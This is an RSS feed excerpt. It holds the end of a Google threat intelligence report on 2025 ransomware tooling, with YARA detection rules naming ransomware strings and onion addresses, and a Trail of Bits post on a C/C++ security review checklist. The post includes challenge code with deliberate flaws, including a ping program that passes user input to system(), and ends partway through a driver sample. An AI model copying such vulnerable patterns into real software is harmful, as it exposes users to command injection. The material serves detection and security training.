<p role="presentation"><span>Threat actors used post-exploitation C2 frameworks in about 15% of 2025 ransomware incidents, a decrease from almost 20% in 2024. The decline in the use of post-exploitation frameworks is largely due to the continued reduction in use of Cobalt Strike BEACON.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Cobalt Strike BEACON was deployed in only 2% of 2025 ransomware incidents, continuing a multi-year downward trend; in 2021 roughly 60% of ransomware incidents involved BEACON, dropping to around 38% in 2022, 20% in 2023, and 11% in 2024. This decrease could in part be attributed to some subset of actors exploring new frameworks, like AdaptixC2.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We observed approximately 8% of intrusions involving the AdaptixC2 (ADAPTAGENT) post-exploitation framework. </span><a href="https://unit42.paloaltonetworks.com/adaptixc2-post-exploitation-framework/" rel="noopener" target="_blank"><span>AdaptixC2</span></a><span> is an open-source post-exploitation framework developed for penetration testers; however, similar to the use of CobaltStrike for many years, threat actors often abuse these types of pentesting tools to facilitate their operations.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Less frequently, we observed the penetration frameworks associated with MYTHICAGENT, METASPLOIT, HAVOC, and EXPLORATIONC2.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Extending a trend identified last year, threat actors appear slightly less reliant on remote management tools. Around 24% of 2025 incidents involved at least one RMM, compared to 28% in 2024, and 40% in 2023.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed 10 unique remote management tools in ransomware incidents in 2025 comparable to nine in 2024, but an overall decrease from 13 in 2023.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We also saw a decrease in instances of threat actors leveraging multiple different RMMs within the same intrusion. In 2025, multiple RMMs were only observed in ~5% of incidents, compared to 8% in 2024, and 16% in 2023.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Consistent with recent years, AnyDesk remained the most commonly deployed RMM in ransomware incidents in 2025; however, overall use decreased from roughly 31% in 2023 and 16% in 2024 to 10% in 2025.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors' use of tunnelers remained fairly consistent as compared to 2024; however, there were small shifts in the use of specific tunnelers. For example, CLOUDFLARED was observed in 8% of incidents in 2025 compared to around 4% in 2024.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We've observed a negligible decline in the use of SYSTEMBC, with around 14% of incidents involving the tunneler in 2023, a little over 7% in 2024, and down to a little over 6% in 2025. Notably, Operation Endgame </span><a href="https://www.europol.europa.eu/media-press/newsroom/news/largest-ever-operation-against-botnets-hits-dropper-malware-ecosystem" rel="noopener" target="_blank"><span>disrupted</span></a><span> SYSTEMBC infrastructure in May 2024; while the malware is still being sold on forums, it's plausible that the law enforcement disruption dissuaded some threat actors from continuing to use the malware in their operations.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Throughout 2025, threat actors continued to leverage common publicly available network scanning tools such as Advanced IP Scanner and SoftPerfect Network Scanner in around 50% of intrusions, consistent with the 2024 rate.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In 2025, we observed an increase in the use of public tools like WinRAR and Rclone that are often used by threat actors to facilitate data theft, which aligns with our overall increase in incidents involving suspected or confirmed data theft from 2024 to 2025. Both WinRAR and Rclone were observed in approximately 23% of incidents; in 2024, we observed around 16% of intrusions involving Rclone and only around 8% involving WinRAR.</span></p>
</li>
</ul>
<h3><span>Remediation and Hardening</span></h3>
<p><span>Recommendations to assist in addressing the threat posed by ransomware are captured in our white paper, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ransomware-protection-and-containment-strategies"><span>Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment</span></a><span>. </span></p>
<h3><span>Outlook and Implications</span></h3>
<p><span>Despite ongoing turmoil caused by actor conflicts and disruption, ransomware actors remain highly motivated and the extortion ecosystem demonstrates continued resilience. Several indicators suggest the overall profitability of these operations is, however, declining, and at least some threat actors are shifting their targeting calculus away from large companies to instead focus on higher volume attacks against smaller organizations. This is likely due to increased difficulty in successful deployments due to victims' improved security postures, a greater refusal to pay ransom demands, and enhanced recovery capabilities. In the coming years, evolving regulations, including reporting requirements and payment bans, may further dissuade some companies from making ransom payments. While we anticipate ransomware to remain one of the most dominant threats globally, the reduction in profits may cause some threat actors to seek other monetization methods. This could manifest as increased data theft extortion operations, the use of more aggressive extortion tactics, or opportunistically using access to victim environments for secondary monetization mechanisms such as using compromised infrastructure to send phishing messages.</span></p>
<h3><span>Detections</span></h3>
<h4><span>YARA Rules</span></h4>
<h5><span><span>AGENDA</span></span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APTFIN_Ransom_AGENDA_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$conf1 = "public_rsa_pem" fullword
		$conf2 = "private_rsa_pem" fullword
		$conf3 = "directory_black_list" fullword
		$conf4 = "file_black_list" fullword
		$conf5 = "file_pattern_black_list" fullword
		$conf6 = "process_black_list" fullword
		$conf7 = "win_services_black_list" fullword
		$conf8 = "company_id" fullword
		$conf9 = "note" fullword
		$load_const1 = { 21 B7 F6 F7 }
		$load_const2 = { F6 36 A4 69 }
		$load_s1 = "run_portable_executable" fullword
		$load_s2 = "MemoryLoadLibrary" fullword
		$load_s3 = "_ZN9morph_poc4main"
		$note1 = "Extension: "
		$note2 = "Domain: "
		$note3 = "login: "
		$note4 = "password: "
		$note5 = "Enter credentials-- Credentials"
		$note6 = "-- Qilin"
		$note7 = "-- Recovery"
		$note8 = "www.torproject.org"
		$note9 = ".onion"
		$note10 = "Employees personal data, CVs, DL , SSN."
		$note11 = "%s/%s_RECOVER.txt"
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (7 of ($conf*) or 7 of ($note*) or all of ($load*))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>AGENDA.RUST</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Win_Ransomware_AGENDA_RUST_2_MBeta {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$rust = "/rust/"
		$conf1 = "\"public_rsa_pem\":"
		$conf2 = "\"private_rsa_pem\":"
		$conf3 = "\"directory_black_list\":"
		$conf4 = "\"file_black_list\":"
		$conf5 = "\"file_pattern_black_list\":"
		$conf6 = "\"process_black_list\":"
		$conf7 = "\"win_services_black_list\":"
		$conf8 = "\"company_id\":"
		$conf9 = "\"n\":"
		$conf10 = "\"p\":"
		$conf11 = "\"fast\":"
		$conf12 = "\"skip\":"
		$conf13 = "\"step\":"
		$conf14 = "\"accounts\":"
		$conf15 = "\"note\":"
	condition:
		uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize &lt; 5MB and (($rust and 8 of ($conf*)) or (13 of ($conf*)))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>REDBIKE</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_REDBIKE_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$a1 = ".akira"
		$a2 = "akira_readme.txt"
		$a3 = "akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id"
		$s1 = "--encryption_percent" ascii wide nocase
		$s2 = "--encryption_path" ascii wide nocase
		$s3 = "--share_file" ascii wide nocase
	condition:
		((all of ($s*)) and (any of ($a*))) and (uint16(0) == 0x5A4D) and filesize &gt; 500KB and filesize &lt; 2MB
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>REDBIKE.LINUX</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APTFIN_Ransom_REDBIKE_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$a = "akira_readme.txt"
		$b = "save your TIME, MONEY, EFFORTS"
		$c = "akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad.onion"
		$d = "--encryption_percent"
		$e = "--encryption_path"
		$f = "--share_file"
	condition:
		all of them and (uint32be(0) == 0x7F454C46)
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>CLOP</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_CLOP_rol7XorHash32_ConfigHashes_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$hex_asm_literal_a = { 92 F7 53 7A }
		$hex_asm_literal_b = { 43 29 79 71 }
		$hex_asm_literal_c = { 2A 81 C4 E2 }
		$hex_asm_literal_d = { 2E F4 FA 7E }
		$hex_asm_literal_e = { 31 E5 7F 91 }
		$hex_asm_literal_f = { 16 24 45 D6 }
		$hex_asm_literal_g = { 56 22 93 EA }
	condition:
		all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>CLOP.LINUX</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_CLOP_3 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str_jobmessage_a = "Successfully started daemon-name"
		$str_jobmessage_b = "Could not change working directory to /"
		$str_jobmessage_c = "Could not generate session ID for child process"
		$asm_code_fileordirectory = { 25 00 F0 00 00 3D 00 40 00 00 75 }
		$asm_functioncall_open64_readfile = { 80 01 00 00 C7 44 ( 2? | 6? | A? | E? ) ?? 02 00 00 00 }
		$asm_functioncall_open64_writebytes = { B4 01 00 00 C7 44 ( 2? | 6? | A? | E? ) ?? 42 00 00 00 }
		$asm_encryption_filebuffersize = { 00 E1 F5 05 76 ?? C7 45 ?? 00 E1 F5 05 }
		$asm_encryption_generatekey = { 1F 89 ( C? | D? | E? | F? ) C1 ( C? | D? | E? | F? ) 18 8D ( 0? | 1? ) ( 0? | 1? ) 25 FF 00 [0-2] 29 ( C? | D? | E? | F? ) 83 ( C? | D? | E? | F? ) 01 C9 }
	condition:
		uint32(0) == 0x464C457F and all of ($str_*) or (#asm_code_fileordirectory == 2 and #asm_functioncall_open64_writebytes == 2 and ($asm_encryption_generatekey and $asm_functioncall_open64_readfile and $asm_encryption_filebuffersize))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>PLAYCRYPT</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransomware_PLAYCRYPT_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
		date_created = "2022-12-21"
		date_modified = "2022-12-21"
		rev = "1"
	strings:
		$c1 = { 8A CB 0F B6 D0 8B F2 8B FA D3 EE 8D 4B 01 D3 EF 83 E6 01 83 E7 01 }
		$c2 = { 8D 45 F0 C7 85 D0 FD FF FF 00 00 00 00 50 83 EC 08 }
		$c3 = { 8B 14 0A 8B 4C 32 20 03 D6 89 55 E0 03 CE }
		$c4 = { 8D 8D 80 ?? FF FF E8 C8 ?? FF FF 85 C0 75 61 83 BD [2] FF FF 05 76 58 }
		$c5 = { FF 76 ?? C6 45 EE 00 E8 [2] 00 00 8B F0 8B CF 33 C0 85 F6 0F 48 F0 E8 }
		$c6 = { FF D0 8B F8 83 FF 05 0F [2] 01 00 00 83 FF 06 0F [2] 01 00 00 8B 0E 3B 4E 04 0F [2] 01 00 00 83 FF 04 74 6D 83 FF 01 }
		$s1 = "OpaqueKeyBlob" wide
		$s2 = "AppPolicyGetProcessTerminationMethod"
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize &gt; 100KB and filesize &lt; 200KB and ((2 of ($c*) and all of ($s*)) or (4 of ($c*)))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>PLAYCRYPT.LINUX</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_PLAYCRYPT_LINUX_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "First step is done."
		$s2 = "/dev/urandom"
		$s3 = "esxcli storage filesystem list &gt; storage"
		$s4 = "hosts in exclusion:"
		$s5 = "encrypt: "
		$s6 = ".PLAY" fullword
	condition:
		uint32(0) == 0x464C457F and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>SAFEPAY</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>import "pe"

rule G_Ransom_SAFEPAY_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$hex_asm_snippet = { 10 27 00 00 [0-4] 10 27 00 00 }
	condition:
		pe.imphash() == "ff67c703589f775db9aed5a03e4489b0" and ($hex_asm_snippet)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_SAFEPAY_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$code_string_decode = { 8A C2 32 C1 32 44 0D ?? 34 ?? 88 44 0D ?? 41 83 F9 04 [4-64] B? 4D 5A 00 00 }
		$code_hardware_aes_check = { 0F A2 8B F3 5B 89 07 89 77 ?? 89 4F ?? 89 57 [0-12] ( 00 00 00 02 | C1 ?? 19 ) }
		$code_encrypt_file = { 14 00 10 00 [2-24] 14 00 10 00 [2-32] 00 10 00 5? [0-8] FF ( 15 | D? ) }
		$enc_str1 = { C7 45 ?? 67 4B 3D 49 C7 45 ?? 2F 4F 2F 4D }
		$enc_str2 = { C7 45 ?? 10 3C 51 3E C7 45 ?? 5C 38 4F 3A C7 45 ?? 42 34 58 36 C7 45 ?? 43 30 58 32 66 C7 45 ?? 2D 2C }
		$enc_str3 = { C7 45 ?? A3 8F FF 8D C7 45 ?? EF 8B E4 89 C7 45 ?? E0 87 E0 85 C7 45 ?? E7 83 EC 81 C7 45 ?? FB 9F E8 9D C7 45 ?? FF 9B 98 99 }
		$enc_str4 = { C7 45 ?? 44 40 51 47 C7 45 ?? 51 49 10 10 C7 45 ?? 03 48 43 42 C6 45 ?? 29 }
		$enc_str5 = { C7 45 ?? 77 77 73 74 C7 45 ?? 75 6D 64 70 C7 45 ?? 23 68 63 62 C6 45 ?? 09 }
	condition:
		uint16(0) == 0x5a4d and (all of ($code*) or (any of ($code*) and any of ($enc*)) or (2 of ($enc*)))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>INC</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_INC_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[*] Count of arguments: %d" wide
		$s2 = "[-] Failed" wide
		$s3 = "[+] Start" wide
		$s4 = "INC-README" wide
		$s5 = "--debug" wide
		$s6 = "RECYCLE" wide
	condition:
		all of them and (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>INC (Lynx Branded)</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_INC_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[+] Proccess %s with PID: %d was killed succesffully" wide
		$s2 = "[*] Sending note to printer:" wide
		$s3 = "[+] Recycling bin..." wide
		$s4 = "[*] Starting full encryption in 5s" wide
		$s5 = "[+] Successfully decoded readme!" wide
		$s6 = "[-] Failed" wide
		$lynx = "lynx" ascii wide nocase
	condition:
		$lynx and 4 of ($s*) and (uint16(0) == 0x5A4D) and filesize &lt; 300KB and filesize &gt; 50KB
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>INC (Sinobi Branded)</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_INC_3 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[+] Proccess %s with PID: %d was killed succesffully" wide
		$s2 = "[*] Sending note to printer:" wide
		$s3 = "[+] Recycling bin..." wide
		$s4 = "[*] Starting full encryption in 5s" wide
		$s5 = "[+] Successfully decoded readme!" wide
		$s6 = "[-] Failed" wide
		$sin = "sinobi" ascii wide nocase
	condition:
		$sin and 4 of ($s*) and (uint16(0) == 0x5A4D) and filesize &lt; 400KB and filesize &gt; 50KB
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>INC.LINUX</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_INC_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[*] Count of arguments: %d"
		$s2 = "[-] Failed"
		$s3 = "[+] Start"
		$s4 = "INC-README"
		$s5 = "--debug"
		$s6 = "vmsvc"
	condition:
		all of them and uint32(0) == 0x464c457f
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>RANSOMHUB</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_RANSOMHUB_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str1 = "json:\"settings\""
		$str2 = "json:\"extension\""
		$str3 = "json:\"net_spread\""
		$str4 = "json:\"local_disks\""
		$str5 = "json:\"running_one\""
		$str6 = "json:\"self_delete\""
		$str7 = "json:\"white_files\""
		$str8 = "json:\"white_hosts\""
		$str9 = "json:\"credentials\""
		$str10 = "json:\"kill_services\""
		$str11 = "json:\"set_wallpaper\""
		$str12 = "json:\"white_folders\""
		$str13 = "json:\"note_file_name\""
		$str14 = "json:\"note_full_text\""
		$str15 = "json:\"kill_processes\""
		$str16 = "json:\"network_shares\""
		$str17 = "json:\"note_short_text\""
		$str18 = "json:\"master_public_key\""
	condition:
		14 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>FURYSTORM</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_FURYSTORM_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "Whitelist VM id"
		$s2 = "gwfn6l3bk45o2zecvi7xtyqrpsudmahj"
		$s3 = "Dry-run"
		$s4 = "-paths"
		$s5 = "-vmsvc"
		$s6 = "Note: motd=%d login=%d clean=%d"
		$s7 = "Cryptor args"
		$s8 = "VMX found"
		$s9 = "Keys: %016l"
		$s10 = "vim-cmd"
		$s11 = "Dropping readme"
		$s12 = "Encryption params"
	condition:
		uint32(0) == 0x464c457f and filesize &gt; 50KB and filesize &lt; 700KB and 6 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_FURYSTORM_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "Failed decrypt file:"
		$s2 = "Decryptor args:"
		$s3 = "Private key loaded"
		$s4 = "Keys: %016l"
		$s5 = "Dry-run"
		$s6 = "Encryption params"
		$s7 = "Whitelist paths"
		$s8 = "Note: motd=%d"
	condition:
		uint32(0) == 0x464c457f and filesize &gt; 50KB and filesize &lt; 300KB and 6 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>FIREFLAME</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Autopatt_Ransom_FIREFLAME_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$p00_0 = { 8B CE 8D 5F ?? 8A 01 8D 49 ?? 0F B6 C0 83 E8 ?? 8D 04 40 C1 E0 ?? 99 }
		$p00_1 = { 55 8B EC FF 75 ?? E8 [4] 59 8B 4D ?? 89 01 F7 D8 1B C0 }
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (($p00_0 in (0 .. 380000) and $p00_1 in (260000 .. 280000)))
}</code></pre></div>
<div class="block-paragraph_advanced"><h3><span>Acknowledgements</span></h3>
<p><span>This analysis would not have been possible without the assistance of Dima Lenz, Chastine Altares, Ana Foreman, and the Advanced Practices, Mandiant Consulting, and FLARE teams. </span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Master C and C++ with our new Testing Handbook chapter]]></title>
<description><![CDATA[We added a new chapter to our Testing Handbook: a comprehensive security checklist for C and C++ code. We’ve identified a broad range of common bug classes, known footguns, and API gotchas across C and C++ codebases and organized them into sections covering Linux, Windows, and seccomp. Whereas ot...]]></description>
<link>https://tsecurity.de/de/3501394/it-security-nachrichten/master-c-and-c-with-our-new-testing-handbook-chapter/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501394/it-security-nachrichten/master-c-and-c-with-our-new-testing-handbook-chapter/</guid>
<pubDate>Fri, 08 May 2026 23:19:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>We added a new chapter to our Testing Handbook: <a href="https://appsec.guide/docs/languages/c-cpp/">a comprehensive security checklist for C and C++ code</a>. We’ve identified a broad range of common bug classes, known footguns, and API gotchas across C and C++ codebases and organized them into sections covering Linux, Windows, and seccomp. Whereas other handbook chapters focus on static and dynamic analysis, this chapter offers a strong basis for manual code review.</p>
<p>LLM enthusiasts rejoice: we’re also developing a Claude skill based on this new chapter. It will turn the checklist into bug-finding prompts that an LLM can run against a codebase, and it’ll be platform and threat-model aware. Be sure to give it a try when we release it.</p>
<p>And after reading the chapter, you can test your C/C++ review skills against two challenges at the end of this post. Be in the <a href="http://trailofbits.com/c-whats-wrong-challenge/">first 10 to submit correct answers</a> to win Trail of Bits swag!</p>
<h2>What’s in the chapter</h2>
<p>The chapter covers five areas: general bug classes, Linux usermode and kernel, Windows usermode and kernel, and seccomp/BPF sandboxes. It starts with language-level issues in the bug classes section—memory safety, integer errors, type confusion, compiler-introduced bugs—and gets progressively more environment-specific.</p>
<p>The Linux usermode section focuses on libc gotchas. This section is also applicable to most POSIX systems. It ranges from well-known problems with string methods, to somewhat less known caveats around privilege dropping and environment variable handling. The Linux kernel is a complicated beast, and no checklist could cover even a part of its intricacies. However, our new Testing Handbook chapter can give you a starting point to bootstrap manual reviews of drivers and modules.</p>
<p>The Windows sections cover DLL planting, unquoted path vulnerabilities in <code>CreateProcess</code>, and path traversal issues. This last bug class includes concerns like <a href="https://devco.re/blog/2025/01/09/worstfit-unveiling-hidden-transformers-in-windows-ansi/">WorstFit Unicode bugs</a>, where characters outside the basic ANSI set can be reinterpreted in ways that bypass path checks entirely. The kernel section addresses driver-specific concerns such as device access controls, denial of service through improper spinlock usage, security issues arising from passing handles from usermode to kernelmode, and various sharp edges in Windows kernel APIs.</p>
<p>Linux <a href="https://man7.org/linux/man-pages/man2/seccomp.2.html">seccomp</a> and <a href="https://man7.org/linux/man-pages/man2/bpf.2.html">BPF</a> features are often used for sandboxing. While more modern tools like <a href="https://docs.kernel.org/userspace-api/landlock.html">Landlock</a> and <a href="https://man7.org/linux/man-pages/man7/namespaces.7.html">namespaces</a> exist for this task, we still see a combination of these older features during audits. And we always uncover a lot of issues. The new Testing Handbook chapter covers sandbox bypasses we’ve seen, like <code>io_uring</code> syscalls that execute without the BPF filter ever seeing them, the <a href="https://man7.org/linux/man-pages/man2/clone.2.html"><code>CLONE_UNTRACED</code></a> flag that lets a tracee effectively disable seccomp filters, and memory-level race conditions in ptrace-based sandboxes.</p>
<h2>Test your review skills</h2>
<p>We’ve provided two challenges below that contain real bug classes from the checklist. Try to spot the issues, then <a href="http://trailofbits.com/c-whats-wrong-challenge">submit your answers</a>. If you’re in the first 10 to submit correct answers, you’ll receive Trail of Bits swag. The challenge will close April 17, so get your answers in before then.</p>
<p>Stuck? Don’t worry. We’ll be publishing the answers in a follow-up blog post, so don’t forget to #like and #subscribe, by which we mean <a href="https://blog.trailofbits.com/index.xml">add our RSS feed to your reader</a>.</p>
<h3>The many quirks of Linux libc</h3>
<p>In this simple ping program, there are two libc gotchas that make the program trivially exploitable. Can you find and explain the issues? If you can’t, check out the handbook chapter. Both bugs are covered in the Linux usermode section.</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;arpa/inet.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp"></span>
</span></span><span class="line"><span class="cl"><span class="cp">#define ALLOWED_IP "127.3.3.1"
</span></span></span><span class="line"><span class="cl"><span class="cp"></span>
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">ip_addr</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"> <span class="k">struct</span> <span class="n">in_addr</span> <span class="n">to_ping_host</span><span class="p">,</span> <span class="n">trusted_host</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="c1">// get address
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">fgets</span><span class="p">(</span><span class="n">ip_addr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">ip_addr</span><span class="p">),</span> <span class="n">stdin</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">ip_addr</span><span class="p">[</span><span class="nf">strcspn</span><span class="p">(</span><span class="n">ip_addr</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">)]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="c1">// verify address
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">inet_aton</span><span class="p">(</span><span class="n">ip_addr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">to_ping_host</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">ip_addr_resolved</span> <span class="o">=</span> <span class="nf">inet_ntoa</span><span class="p">(</span><span class="n">to_ping_host</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="c1">// prevent SSRF
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="k">if</span> <span class="p">((</span><span class="nf">ntohl</span><span class="p">(</span><span class="n">to_ping_host</span><span class="p">.</span><span class="n">s_addr</span><span class="p">)</span> <span class="o">&gt;&gt;</span> <span class="mi">24</span><span class="p">)</span> <span class="o">==</span> <span class="mi">127</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="c1">// only allowed
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">inet_aton</span><span class="p">(</span><span class="n">ALLOWED_IP</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">trusted_host</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">trusted_resolved</span> <span class="o">=</span> <span class="nf">inet_ntoa</span><span class="p">(</span><span class="n">trusted_host</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">ip_addr_resolved</span><span class="p">,</span> <span class="n">trusted_resolved</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="c1">// ping
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="kt">char</span> <span class="n">cmd</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"> <span class="nf">snprintf</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">cmd</span><span class="p">),</span> <span class="s">"ping '%s'"</span><span class="p">,</span> <span class="n">ip_addr</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="nf">system</span><span class="p">(</span><span class="n">cmd</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span></span></span></code></pre>
</figure>
<h3>Windows driver registry gotchas</h3>
<p>This Windows Driver Framework (WDF) driver request handler queries product version values from the registry. There are several bugs here, including an easy-to-exploit denial of service, but one of them leads to kernel code execution by messing with the registry values. Can you figure out the bug and how to exploit it?</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">NTSTATUS</span>
</span></span><span class="line"><span class="cl"><span class="nf">InitServiceCallback</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">_In_</span> <span class="n">WDFREQUEST</span> <span class="n">Request</span>
</span></span><span class="line"><span class="cl"><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="n">NTSTATUS</span> <span class="n">status</span><span class="p">;</span>
